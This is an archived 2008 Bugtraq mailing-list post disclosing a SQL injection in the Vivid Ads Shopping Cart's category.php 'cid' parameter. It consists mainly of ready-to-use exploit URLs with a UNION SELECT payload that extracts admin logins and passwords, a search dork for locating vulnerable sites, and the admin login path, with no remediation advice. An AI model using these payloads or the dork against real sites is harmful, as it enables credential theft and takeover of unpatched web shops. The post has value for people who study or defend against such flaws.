Bugtraq mailing list archives

Vivid Ads Shopping Cart (cid) Remote SQL Injection

From: djmomo () live com
Date: Tue, 14 Oct 2008 22:05:48 -0600

##  Vivid Ads Shopping Cart (cid) Remote SQL Injection ##

## Discovered By : KoDoQ_GiLa () irc mildnet org 15/10/2008

## HomePage :  http://mildnet.org

## Thx to : Nyubi aka Solpot,home_edition2001,dead,ardan,

            anakbugis,kaka11,rahulx_is_back,anti_underground,che`io

            AND FOR ALL IRC.MILDNET.ORG COMMUNITY

#################################################################################


## Dork : "Vivid Ads Shopping Cart" ##

=-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-=

http://www.target.com/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin--
http://www.target.com/vivid_ads
folder/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin--

======== (AdMiN LoGiN) =======

http://www.target.com/admin/


## Contact person : djmomo[At]live[DoT]com


## VIVA IRC.MILDNET.ORG ##

Current thread:

Vivid Ads Shopping Cart (cid) Remote SQL Injection djmomo (Oct 15)